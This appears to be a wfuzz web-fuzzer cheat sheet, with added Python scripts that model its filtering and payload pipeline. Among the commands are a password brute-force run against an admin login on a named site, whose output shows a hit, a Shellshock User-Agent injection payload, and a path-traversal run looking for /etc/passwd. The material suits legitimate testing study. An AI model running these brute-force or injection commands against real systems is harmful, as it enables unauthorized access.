116-wfuzz
wfuzz
A fuzzer written in Python
- Feature-rich, fast, flexible and extensible
- Submits data to the server through every entry point (IP, domain, port, method, parameters, headers, ...)
- Marks the injection point with a placeholder (FUZZ)
- Replaces the placeholder with the specified payload and submits the data
Payload modules (encoders/iterators/scripts/printers)
wfuzz -e payloads
wfuzz -z help --slice file #detailed information on the file payload
wfuzz -z range,1-254 -z file,a.txt --hc 404 http://1.1.1.FUZZ/FUZ2Z
-Z --conn-delay 3 --req-delay 3
wfuzz -z range,1-254 -z file,a.txt --hh BBB http://1.1.1.FUZZ{b}/FUZ2Z{a}
/usr/share/wordlists 23s root@kali 0.07 14:40:25
❯ wfuzz -c -v -w ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -d "user=admin&pw=FUZZ{a}" --hh BBB -u "http://www.c1moon.com/admin/index.php?action=login"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://www.c1moon.com/admin/index.php?action=login
Total requests: 10000
====================================================================================================================================================
ID           C.Time       Response   Lines    Word       Chars       Server                    Redirect   Payload
====================================================================================================================================================
000000001:   1.039s       200        33 L     100 W      1549 Ch     Microsoft-IIS/8.5                    "a"
000000002:   1.063s       302        1 L      3 W        87 Ch       Microsoft-IIS/8.5         ./         "123456"
^C
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 141
Filtered Requests: 139
Requests/sec.: 0
wfuzz -H "User-Agent: () { :;}; echo; echo XXX" --ss XXX -w cgi.txt http://a/FUZZ
Result filtering
- --hc / --sc #response code
- --hl / --sl #number of lines in the response body
- --hw / --sw #number of words in the response body
- --hh / --sh #number of chars in the response body
- --hs / --ss #regex match on the response body
--filter
wfuzz -c -v -z list,a-b-admin -z list,1-2-password -d "username=FUZZ&password=FUZ2Z&Login=Login" --filter "headers.response.Location='~index.php'" http://url/dvwa/login.php
- http://wfuzz.readthedocs.io/en/latest/
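The hide/show switches above are the whole triage step: a failed login (or a missing file) returns a response of constant size, so dropping the majority length with --hh, or a known code with --hc, leaves only the one response that differs, exactly like the single 302 row in the session output above. The following Python model of that filtering is an added example, not wfuzz's own code; the result rows are constructed, and the --filter Location check is assumed to be a substring match.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class FuzzResult:
    """One row of the wfuzz result table (code, lines, words, chars, payload)."""
    code: int
    lines: int
    words: int
    chars: int
    payload: str
    body: str = ""
    headers: Dict[str, str] = field(default_factory=dict)


# Constructed sample rows, not captured traffic: a failed login returns the same
# 200 page every time, one candidate triggers a redirect, one path is missing.
SAMPLE: List[FuzzResult] = [
    FuzzResult(200, 33, 100, 1549, "a", body="<h1>Login failed</h1>"),
    FuzzResult(200, 33, 100, 1549, "admin", body="<h1>Login failed</h1>"),
    FuzzResult(302, 1, 3, 87, "123456", headers={"Location": "./index.php"}),
    FuzzResult(404, 9, 30, 210, "missing", body="Not Found"),
    FuzzResult(200, 33, 100, 1549, "password", body="<h1>Login failed</h1>"),
]


def hide(results, hc=(), hl=(), hw=(), hh=(), hs: Optional[str] = None):
    """--hc/--hl/--hw/--hh/--hs: drop rows matching any listed code, line,
    word or char count, or whose body matches the regex."""
    kept = []
    for r in results:
        if r.code in hc or r.lines in hl or r.words in hw or r.chars in hh:
            continue
        if hs is not None and re.search(hs, r.body):
            continue
        kept.append(r)
    return kept


def show(results, sc=(), sl=(), sw=(), sh=(), ss: Optional[str] = None):
    """--sc/--sl/--sw/--sh/--ss: keep only rows matching one of the criteria."""
    kept = []
    for r in results:
        if r.code in sc or r.lines in sl or r.words in sw or r.chars in sh:
            kept.append(r)
        elif ss is not None and re.search(ss, r.body):
            kept.append(r)
    return kept


def baseline_chars(results):
    """Most common response length; stands in for the BBB value that wfuzz
    takes from the {baseline} request (approximated here by the majority row)."""
    return Counter(r.chars for r in results).most_common(1)[0][0]


def filter_location(results, needle):
    """Approximation of --filter "headers.response.Location='~index.php'":
    assumed here to mean a substring match on the Location header."""
    return [r for r in results if needle in r.headers.get("Location", "")]


def payloads(results):
    """Payload column of the surviving rows."""
    return [r.payload for r in results]


if __name__ == "__main__":
    bbb = baseline_chars(SAMPLE)
    print("baseline chars:", bbb)
    print("--hc 404 --hh BBB ->", payloads(hide(SAMPLE, hc=[404], hh=[bbb])))
    print("--ss failed ->", payloads(show(SAMPLE, ss="failed")))
    print("--filter Location ~index.php ->", payloads(filter_location(SAMPLE, "index.php")))
```

Running the script shows that `--hc 404 --hh 1549` reduces the five rows to the single redirect, which is the same outcome the `--hh BBB` run above reaches after 141 requests with 139 filtered.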
URL parameters
wfuzz -c -v -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -b "security=low; PHPSESSID=898d5fb4a2b85261f1dff1fca1d9b30c" --ss 'root;x' -u http://ip/dvwa/vulnerabilities/fi/?page=FUZZ
Testing cookies
wfuzz -z file,a.txt -b cookie=FUZZ http://ip/
Testing headers
wfuzz -z file,a.txt -H "User-Agent: IE99" http://ip/FUZZ
Request methods
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS-DELETE-MOVE -X FUZZ ip
Using a proxy
wfuzz -z file,a.txt -p ip:8080 http://ip/FUZZ
HTTP authentication
wfuzz -z list,user-pass --basic FUZZ:FUZ2Z http://ip/
Recursion depth
wfuzz -z file,a.txt -R 3 http://ip/FUZZ
Rate control
-t #threads (concurrency)
-s #delay between requests
Output format
wfuzz -f outfile,json -w a.txt http://ip/FUZZ
Global configuration: ~/.wfuzz/wfuzz.ini
cancel_on_plugin_except = 1 #exit when a plugin raises an exception
concurrent_plugins = 3 #maximum number of concurrent plugins
lookup_dirs = . #directories searched for wordlist files
encode_space = 1 #encode spaces
Iterators module
wfuzz -e iterators
zip: pairs the dictionaries up / chain: several dictionaries feed one variable / product: cross product (default)
wfuzz -z list,a-b-c -z list,1-2-3 -m zip http://ip/FUZZ/FUZ2Z
Encoders module
wfuzz -z file,a.txt,md5 http://ip/FUZZ
Script module
wfuzz --script=robots -z list,robots.txt http://ip/FUZZ
Saving and replaying a job
wfuzz --script=robots -z list,a.txt --dump-recipe job1 http://ip/FUZZ
wfuzz --recipe job1
Pre-filtering payloads
wfuzz -z list,1-2-1-2-a --slice "FUZZ|u()" http://1.1.1.1/FUZZ
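The iterator, encoder and slice sections above describe one payload pipeline: each -z source is de-duplicated by --slice, transformed by its encoder, combined with the other sources by the -m iterator, and substituted into the FUZZ/FUZ2Z markers (with any {b}/{a} suffix recorded as the baseline request that BBB refers to). The script below reproduces that pipeline as an added example; it is not wfuzz's code, the encoder names other than md5 are assumed equivalents, and it simplifies by applying one encoder to every list where -z sets it per list.

```python
import hashlib
import itertools
import re
import urllib.parse

# Encoder table. "md5" mirrors "-z file,a.txt,md5"; the other names are assumed
# equivalents written for this example, not wfuzz's own encoder implementations.
ENCODERS = {
    "none": lambda s: s,
    "md5": lambda s: hashlib.md5(s.encode()).hexdigest(),
    "sha1": lambda s: hashlib.sha1(s.encode()).hexdigest(),
    "urlencode": lambda s: urllib.parse.quote(s, safe=""),
}

# FUZZ, FUZ2Z, FUZ3Z ... optionally followed by a {baseline} value.
MARKER = re.compile(r"FUZ(\d*)Z(?:\{([^}]*)\})?")


def _index(m):
    """FUZZ is variable 1, FUZ2Z is variable 2, and so on."""
    return int(m.group(1)) if m.group(1) else 1


def parse_template(template):
    """Split http://1.1.1.FUZZ{b}/FUZ2Z{a} into the bare template and the
    baseline values {b}/{a} that --hh BBB compares against."""
    baseline = {}

    def strip(m):
        idx = _index(m)
        if m.group(2) is not None:
            baseline[idx] = m.group(2)
        return "FUZZ" if idx == 1 else f"FUZ{idx}Z"

    return MARKER.sub(strip, template), baseline


def substitute(template, values):
    """Fill FUZZ, FUZ2Z, ... from a tuple of payloads (values[0] -> FUZZ)."""
    def fill(m):
        idx = _index(m)
        return values[idx - 1] if idx - 1 < len(values) else m.group(0)

    return MARKER.sub(fill, template)


def baseline_request(template):
    """The first request wfuzz sends when {b}/{a} defaults are present."""
    bare, defaults = parse_template(template)
    values = tuple(defaults.get(i, "") for i in range(1, max(defaults, default=0) + 1))
    return substitute(bare, values)


def unique(payloads):
    """--slice "FUZZ|u()": drop repeated payloads, keeping first-seen order."""
    seen, kept = set(), []
    for p in payloads:
        if p not in seen:
            seen.add(p)
            kept.append(p)
    return kept


def encode(payloads, encoder="none"):
    """Apply one encoder to every payload, as the third field of -z does."""
    return [ENCODERS[encoder](p) for p in payloads]


def combine(mode, *wordlists):
    """-m product (default): every combination; -m zip: pair the lists up;
    -m chain: every list feeds the single FUZZ variable."""
    if mode == "product":
        return list(itertools.product(*wordlists))
    if mode == "zip":
        return list(zip(*wordlists))
    if mode == "chain":
        return [(p,) for p in itertools.chain(*wordlists)]
    raise ValueError(f"unknown iterator {mode!r}")


def build_requests(template, mode, *wordlists, encoder="none"):
    """unique -> encode -> iterate -> substitute; returns the request URLs."""
    bare, _ = parse_template(template)
    lists = [encode(unique(w), encoder) for w in wordlists]
    return [substitute(bare, combo) for combo in combine(mode, *lists)]


if __name__ == "__main__":
    print(baseline_request("http://1.1.1.FUZZ{b}/FUZ2Z{a}"))
    for mode in ("zip", "product"):
        reqs = build_requests("http://ip/FUZZ/FUZ2Z", mode, ["a", "b", "c"], ["1", "2", "3"])
        print(mode, len(reqs), reqs[:3])
    print(build_requests("http://ip/FUZZ", "chain", ["1", "2", "1", "2", "a"], encoder="md5"))
```

The request counts are the practical point: with the two three-entry lists from the -m zip command above, zip sends 3 requests, the default product sends 9, and chain sends 6 into a single FUZZ, so the iterator choice decides how much traffic a run generates before any filtering happens.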
wfuzz library
import wfuzz
# Python 3 syntax; each -z option becomes a (payload_name, options) tuple
a = wfuzz.fuzz(url="http://ip/FUZZ", hc=[404], payloads=[("file", dict(fn="a.txt"))])
for r in a:
    print(r)